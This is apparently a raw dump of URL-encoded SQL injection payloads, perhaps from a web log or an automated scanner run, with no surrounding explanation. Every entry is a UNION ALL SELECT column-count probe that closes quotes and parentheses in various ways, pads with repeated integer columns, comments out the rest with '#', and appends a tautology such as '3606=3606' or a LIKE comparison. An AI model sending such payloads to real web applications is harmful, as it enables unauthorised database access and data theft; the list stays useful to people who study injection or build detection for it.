-2183%29%29%20UNION%20ALL%20SELECT%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%2C%203509%23%20AND%20%28%283606%3D3606 -8735%29%29%20UNION%20ALL%20SELECT%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%23%20AND%20%28%283009%3D3009 -2606%29%29%20UNION%20ALL%20SELECT%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%2C%201126%23%20AND%20%28%282090%3D2090 -1277%29%29%20UNION%20ALL%20SELECT%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%2C%201698%23%20AND%20%28%285326%3D5326 -8903%29%29%29%20UNION%20ALL%20SELECT%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%2C%208438%23%20AND%20%28%28%288813%3D8813 -4091%29%29%29%20UNION%20ALL%20SELECT%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%2C%201897%23%20AND%20%28%28%283362%3D3362 -4363%29%29%29%20UNION%20ALL%20SELECT%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%2C%201196%23%20AND%20%28%28%287435%3D7435 -2737%29%29%29%20UNION%20ALL%20SELECT%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%2C%206381%23%20AND%20%28%28%287530%3D7530 -9027%29%29%29%20UNION%20ALL%20SELECT%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%2C%205717%23%20AND%20%28%28%282793%3D2793 -8905%29%29%29%20UNION%20ALL%20SELECT%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%2C%206222%23%20AND%20%28%28%283843%3D3843 -3889%29%29%29%20UNION%20ALL%20SELECT%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%2C%209327%23%20AND%20%28%28%284386%3D4386 -4704%29%29%29%20UNION%20ALL%20SELECT%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%23%20AND%20%28%28%287714%3D7714 -2392%29%29%29%20UNION%20ALL%20SELECT%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%2C%207123%23%20AND%20%28%28%281903%3D1903 -9325%29%29%29%20UNION%20ALL%20SELECT%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%23%20AND%20%28%28%289767%3D9767 -9545%20UNION%20ALL%20SELECT%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%2C%205189%23 -9701%20UNION%20ALL%20SELECT%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%2C%201174%23 -2463%20UNION%20ALL%20SELECT%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%23 -5625%20UNION%20ALL%20SELECT%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%2C%206069%23 -8123%20UNION%20ALL%20SELECT%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%2C%208695%23 -5399%20UNION%20ALL%20SELECT%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%2C%202981%23 -9151%20UNION%20ALL%20SELECT%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%2C%209231%23 -1508%20UNION%20ALL%20SELECT%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%2C%205032%23 -3475%20UNION%20ALL%20SELECT%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%23 -2483%20UNION%20ALL%20SELECT%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%2C%206075%23 -6232%27%29%20UNION%20ALL%20SELECT%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%2C%206082%23%20AND%20%28%27MLGy%27%3D%27MLGy -8954%27%29%20UNION%20ALL%20SELECT%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%23%20AND%20%28%27NJcr%27%3D%27NJcr -2500%27%29%20UNION%20ALL%20SELECT%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%23%20AND%20%28%27Wbsa%27%3D%27Wbsa -6617%27%29%20UNION%20ALL%20SELECT%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%2C%207464%23%20AND%20%28%27waJG%27%3D%27waJG -1284%27%29%20UNION%20ALL%20SELECT%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%2C%204135%23%20AND%20%28%27cFZu%27%3D%27cFZu -7808%27%29%20UNION%20ALL%20SELECT%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%2C%206333%23%20AND%20%28%27Prab%27%3D%27Prab -8866%27%29%20UNION%20ALL%20SELECT%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%2C%201811%23%20AND%20%28%27aHXP%27%3D%27aHXP -4526%27%29%20UNION%20ALL%20SELECT%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%2C%209454%23%20AND%20%28%27FujI%27%3D%27FujI -2965%27%29%20UNION%20ALL%20SELECT%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%2C%205736%23%20AND%20%28%27SzvY%27%3D%27SzvY -2459%27%29%20UNION%20ALL%20SELECT%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%2C%206820%23%20AND%20%28%27EMcS%27%3D%27EMcS -9888%27%29%29%20UNION%20ALL%20SELECT%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%23%20AND%20%28%28%27wdIi%27%3D%27wdIi -2460%27%29%29%20UNION%20ALL%20SELECT%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%2C%208797%23%20AND%20%28%28%27SvyI%27%3D%27SvyI -2639%27%29%29%20UNION%20ALL%20SELECT%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%2C%206845%23%20AND%20%28%28%27sgpE%27%3D%27sgpE -3017%27%29%29%20UNION%20ALL%20SELECT%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%2C%203651%23%20AND%20%28%28%27kCuV%27%3D%27kCuV -6724%27%29%29%20UNION%20ALL%20SELECT%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%23%20AND%20%28%28%27LNzL%27%3D%27LNzL -9459%27%29%29%20UNION%20ALL%20SELECT%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%2C%201824%23%20AND%20%28%28%27cDpi%27%3D%27cDpi -4214%27%29%29%20UNION%20ALL%20SELECT%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%2C%208822%23%20AND%20%28%28%27oDig%27%3D%27oDig -7819%27%29%29%20UNION%20ALL%20SELECT%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%2C%206607%23%20AND%20%28%28%27Zcpy%27%3D%27Zcpy -9647%27%29%29%20UNION%20ALL%20SELECT%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%2C%207780%23%20AND%20%28%28%27lrpg%27%3D%27lrpg -8844%27%29%29%20UNION%20ALL%20SELECT%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%2C%208936%23%20AND%20%28%28%27VAbk%27%3D%27VAbk -5235%27%29%29%29%20UNION%20ALL%20SELECT%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%23%20AND%20%28%28%28%27zcon%27%3D%27zcon -7841%27%29%29%29%20UNION%20ALL%20SELECT%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%23%20AND%20%28%28%28%27Npat%27%3D%27Npat -1483%27%29%29%29%20UNION%20ALL%20SELECT%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%2C%206969%23%20AND%20%28%28%28%27hlqt%27%3D%27hlqt -4020%27%29%29%29%20UNION%20ALL%20SELECT%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%2C%207981%23%20AND%20%28%28%28%27ggrn%27%3D%27ggrn -2363%27%29%29%29%20UNION%20ALL%20SELECT%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%2C%204133%23%20AND%20%28%28%28%27nYKn%27%3D%27nYKn -1224%27%29%29%29%20UNION%20ALL%20SELECT%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%2C%201979%23%20AND%20%28%28%28%27RPum%27%3D%27RPum -8041%27%29%29%29%20UNION%20ALL%20SELECT%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%2C%206817%23%20AND%20%28%28%28%27nuHO%27%3D%27nuHO -5902%27%29%29%29%20UNION%20ALL%20SELECT%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%2C%202059%23%20AND%20%28%28%28%27OiTp%27%3D%27OiTp -2618%27%29%29%29%20UNION%20ALL%20SELECT%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%23%20AND%20%28%28%28%27KaeP%27%3D%27KaeP -8889%27%29%29%29%20UNION%20ALL%20SELECT%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%23%20AND%20%28%28%28%27OiPt%27%3D%27OiPt -8314%27%20UNION%20ALL%20SELECT%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%2C%205207%23%20AND%20%27WMuv%27%3D%27WMuv -2480%27%20UNION%20ALL%20SELECT%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%23%20AND%20%27Rprt%27%3D%27Rprt -8659%27%20UNION%20ALL%20SELECT%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%2C%206033%23%20AND%20%27jQkF%27%3D%27jQkF -4343%27%20UNION%20ALL%20SELECT%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%2C%207179%23%20AND%20%27thGI%27%3D%27thGI -5248%27%20UNION%20ALL%20SELECT%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%2C%202217%23%20AND%20%27QlFg%27%3D%27QlFg -5415%27%20UNION%20ALL%20SELECT%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%23%20AND%20%27golv%27%3D%27golv -8574%27%20UNION%20ALL%20SELECT%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%2C%208992%23%20AND%20%27DrMz%27%3D%27DrMz -8417%27%20UNION%20ALL%20SELECT%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%23%20AND%20%27QcnM%27%3D%27QcnM -7635%27%20UNION%20ALL%20SELECT%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%23%20AND%20%27UlSR%27%3D%27UlSR -9520%27%20UNION%20ALL%20SELECT%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%2C%209410%23%20AND%20%27yrrp%27%3D%27yrrp -8021%27%29%20UNION%20ALL%20SELECT%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%23%20AND%20%28%27keSt%27%20LIKE%20%27keSt -5215%27%29%20UNION%20ALL%20SELECT%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%2C%205412%23%20AND%20%28%27BsBe%27%20LIKE%20%27BsBe -9571%27%29%20UNION%20ALL%20SELECT%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%23%20AND%20%28%27wteC%27%20LIKE%20%27wteC -4833%27%29%20UNION%20ALL%20SELECT%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%2C%205262%23%20AND%20%28%27BfdB%27%20LIKE%20%27BfdB -9893%27%29%20UNION%20ALL%20SELECT%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%2C%204267%23%20AND%20%28%27zOEc%27%20LIKE%20%27zOEc -9795%27%29%20UNION%20ALL%20SELECT%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%2C%203498%23%20AND%20%28%27wQle%27%20LIKE%20%27wQle -2055%27%29%20UNION%20ALL%20SELECT%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%2C%209155%23%20AND%20%28%27mhdY%27%20LIKE%20%27mhdY -4402%27%29%20UNION%20ALL%20SELECT%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%2C%205668%23%20AND%20%28%27CLQv%27%20LIKE%20%27CLQv -8394%27%29%20UNION%20ALL%20SELECT%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%23%20AND%20%28%27OsHp%27%20LIKE%20%27OsHp -1471%27%29%20UNION%20ALL%20SELECT%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%23%20AND%20%28%27Kcfe%27%20LIKE%20%27Kcfe -3896%27%29%29%20UNION%20ALL%20SELECT%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%2C%201658%23%20AND%20%28%28%27ybxj%27%20LIKE%20%27ybxj 